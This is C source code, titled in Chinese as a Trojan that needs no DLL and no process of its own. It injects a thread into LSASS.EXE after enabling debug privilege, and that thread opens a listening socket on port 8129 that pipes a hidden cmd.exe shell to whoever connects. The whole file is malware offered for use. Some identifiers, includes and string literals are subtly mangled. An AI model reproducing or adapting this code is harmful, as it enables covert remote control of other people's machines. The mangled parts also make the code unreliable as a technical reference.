无Dll无进程木马源代码

#include 
//#include 
#include 
#include 

#pragma comment(lib,"Shlwapi.lib") 

//参数结构 ; 
typedef struct _RemotePara{ 
DWORD dwLoadLibrary; 
DWORD dwFreeLibrary; 
DWORD dwGetProcAddress; 
DWORD dwGetModuleHandle; 
DWORD dwWSAStartup; 
DWORD dwSocket; 
DWORD dwhtons; 
DWORD dwbind; 
DWORD dwlisten; 
DWORD dwaccept; 
DWORD dwsend; 
DWORD dwrecv; 
DWORD dwclosesocket; 
DWORD dwcreateProcessA; 
DWORD dwPeekNamedPipe; 
DWORD dwWriteFile; 
DWORD dwReadFile; 
DWORD dwCloseHandle; 
DWORD dwcreatePipe; 
DWORD dwTerminateProcess; 

DWORD dwMessageBox; 
char strMessageBox[12]; 
char winsockDll[16]; 
char cmd[10]; 
char Buff[4096]; 
char telnetmsg[60]; 

}RemotePara; 

BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable); // 提升应用级调试权限 
DWORD GetPidByName(char *szName); // 根据进程名称得到进程ID 

// 远程线程执行体 
DWORD __stdcall ThreadProc(RemotePara *Para){ 
WSADATA WSAData; 
SOCKET listenSocket, clientSocket; 
struct sockaddr_in server_addr, client_addr; 
int iAddrSize = sizeof(client_addr); 
SECURITY_ATTRIBUTES sa; 
HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2; 
STARTUPINFO si; 
PROCESS_INFORMATION ProcessInformation; 
unsigned long lBytesRead = 0; 

typedef HINSTANCE (__stdcall *PLoadLibrary)(char*); 
typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR); 
typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE ); 
typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE); 

FARPROC PMessageBoxA; 
FARPROC PWSAStartup; 
FARPROC PSocket; 
FARPROC Phtons; 
FARPROC Pbind; 
FARPROC Plisten; 
FARPROC Paccept; 
FARPROC Psend; 
FARPROC Precv; 
FARPROC Pclosesocket; 
FARPROC PcreateProcessA; 
FARPROC PPeekNamedPipe; 
FARPROC PWriteFile; 
FARPROC PReadFile; 
FARPROC PCloseHandle; 
FARPROC PcreatePipe; 
FARPROC PTerminateProcess; 

PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary; 
PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress; 
PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwLoadLibrary; 
PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle; 

LoadLibraryFunc(Para->winsockDll); 

PWSAStartup = (FARPROC)Para->dwWSAStartup; 
PSocket = (FARPROC)Para->dwSocket; 
Phtons = (FARPROC)Para->dwhtons; 
Pbind = (FARPROC)Para->dwbind; 
Plisten = (FARPROC)Para->dwlisten; 
Paccept = (FARPROC)Para->dwaccept; 
Psend = (FARPROC)Para->dwsend; 
Precv = (FARPROC)Para->dwrecv; 
Pclosesocket = (FARPROC)Para->dwclosesocket; 
PcreateProcessA = (FARPROC)Para->dwcreateProcessA; 
PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe; 
PWriteFile = (FARPROC)Para->dwWriteFile; 
PReadFile = (FARPROC)Para->dwReadFile; 
PCloseHandle = (FARPROC)Para->dwCloseHandle; 
PcreatePipe = (FARPROC)Para->dwcreatePipe; 
PTerminateProcess = (FARPROC)Para->dwTerminateProcess; 

PMessageBoxA = (FARPROC)Para->dwMessageBox; 

PWSAStartup((WORD)((1<<8)|1), (LPWSADATA)&WSAData); 
listenSocket = PSocket(AF_INET, SOCK_STREAM, 0); 
if(listenSocket == INVALID_SOCKET)return 0; 

server_addr.sin_family = AF_INET; 
server_addr.sin_port = Phtons((unsigned short)(8129)); 
server_addr.sin_addr.s_addr = INADDR_ANY; 

if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0; 
if(Plisten(listenSocket, 5))return 0; 
clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize); 
// Psend(clientSocket, Para->telnetmsg, 60, 0); 

if(!PcreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0; 
if(!PcreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0; 

ZeroMemory(&si,sizeof(si)); //ZeroMemory是C运行库函数，可以直接调用 
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; 
si.wShowWindow = SW_HIDE; 
si.hStdInput = hReadPipe2; 
si.hStdOutput = si.hStdError = hWritePipe1; 

if(!PcreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation))return 0; 
while(1) { 
memset(Para->Buff,0,4096); 
PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0); 
if(lBytesRead) { 
if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break; 
if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break; 
}else { 
lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0); 
if(lBytesRead <=0 ) break; 
if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break; 
} 
} 

PCloseHandle(hWritePipe2); 
PCloseHandle(hReadPipe1); 
PCloseHandle(hReadPipe2); 
PCloseHandle(hWritePipe1); 
Pclosesocket(listenSocket); 
Pclosesocket(clientSocket); 

// PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK); 

return 0; 
} 

int APIENTRY WinMain(HINSTANCE hInstance, 
HINSTANCE hPrevInstance, 
LPSTR lpCmdLine, 
int nCmdShow) 
{ 
const DWORD THREADSIZE=1024*4; 
DWORD byte_write; 
void *pRemoteThread; 
HANDLE hToken,hRemoteProcess,hThread; 
HINSTANCE hKernel,hUser32,hSock; 
RemotePara myRemotePara,*pRemotePara; 
DWORD pID; 

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken); 
EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE); 

// 获得指定进程句柄，并设其权限为PROCESS_ALL_ACCESS 
pID = GetPidByName("LSASS.EXE"); 
if(pID == 0)return 0; 
hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID); 
if(!hRemoteProcess)return 0; 

// 在远程进程地址空间分配虚拟内存 
pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE); 
if(!pRemoteThread)return 0; 

// 将线程执行体ThreadProc写入远程进程 
if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE,0))return 0; 

ZeroMemory(&myRemotePara,sizeof(RemotePara)); 
hKernel = LoadLibrary( "kernel32.dll"); 
myRemotePara.dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA"); 
myRemotePara.dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary"); 
myRemotePara.dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress"); 
myRemotePara.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel, "GetModuleHandleA"); 

myRemotePara.dwcreateProcessA = (DWORD)GetProcAddress(hKernel, "createProcessA"); 
myRemotePara.dwPeekNamedPipe = (DWORD)GetProcAddress(hKernel, "PeekNamedPipe"); 
myRemotePara.dwWriteFile = (DWORD)GetProcAddress(hKernel, "WriteFile"); 
myRemotePara.dwReadFile = (DWORD)GetProcAddress(hKernel, "ReadFile"); 
myRemotePara.dwCloseHandle = (DWORD)GetProcAddress(hKernel, "CloseHandle"); 
myRemotePara.dwcreatePipe = (DWORD)GetProcAddress(hKernel, "createPipe"); 
myRemotePara.dwTerminateProcess = (DWORD)GetProcAddress(hKernel, "TerminateProcess"); 

hSock = LoadLibrary("wsock32.dll"); 
myRemotePara.dwWSAStartup = (DWORD)GetProcAddress(hSock,"WSAStartup"); 
myRemotePara.dwSocket = (DWORD)GetProcAddress(hSock,"socket"); 
myRemotePara.dwhtons = (DWORD)GetProcAddress(hSock,"htons"); 
myRemotePara.dwbind = (DWORD)GetProcAddress(hSock,"bind"); 
myRemotePara.dwlisten = (DWORD)GetProcAddress(hSock,"listen"); 
myRemotePara.dwaccept = (DWORD)GetProcAddress(hSock,"accept"); 
myRemotePara.dwrecv = (DWORD)GetProcAddress(hSock,"recv"); 
myRemotePara.dwsend = (DWORD)GetProcAddress(hSock,"send"); 
myRemotePara.dwclosesocket = (DWORD)GetProcAddress(hSock,"closesocket"); 

hUser32 = LoadLibrary("user32.dll"); 
myRemotePara.dwMessageBox = (DWORD)GetProcAddress(hUser32, "MessageBoxA"); 

strcat(myRemotePara.strMessageBox,"Sucess!//0"); 
strcat(myRemotePara.winsockDll,"wsock32.dll//0"); 
strcat(myRemotePara.cmd,"cmd.exe//0"); 
strcat(myRemotePara.telnetmsg,"Connect Sucessful!//n//0"); 

//写进目标进程 
pRemotePara =(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE); 
if(!pRemotePara)return 0; 
if(!WriteProcessMemory (hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0; 

// 启动线程 
hThread = createRemoteThread(hRemoteProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write); 

FreeLibrary(hKernel); 
FreeLibrary(hSock); 
FreeLibrary(hUser32); 
CloseHandle(hRemoteProcess); 
CloseHandle(hToken); 

return 0; 
} 

BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){ 
TOKEN_PRIVILEGES tp; 
tp.PrivilegeCount = 1; 
LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid); 
tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0; 
AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL); 
return((GetLastError() == ERROR_SUCCESS)); 
} 

DWORD GetPidByName(char *szName) 
{ 
HANDLE hProcessSnap = INVALID_HANDLE_VALUE; 
PROCESSENTRY32 pe32=; 
DWORD dwRet=0; 

hProcessSnap =createToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 
if(hProcessSnap == INVALID_HANDLE_VALUE)return 0; 

pe32.dwSize = sizeof(PROCESSENTRY32); 
if(Process32First(hProcessSnap, &pe32)) 
{ 
do 
{ 
if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0) 
{ 
dwRet=pe32.th32ProcessID; 
break; 
} 
}while (Process32Next(hProcessSnap,&pe32)); 
} 
else return 0; 

if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap); 
return dwRet; 
}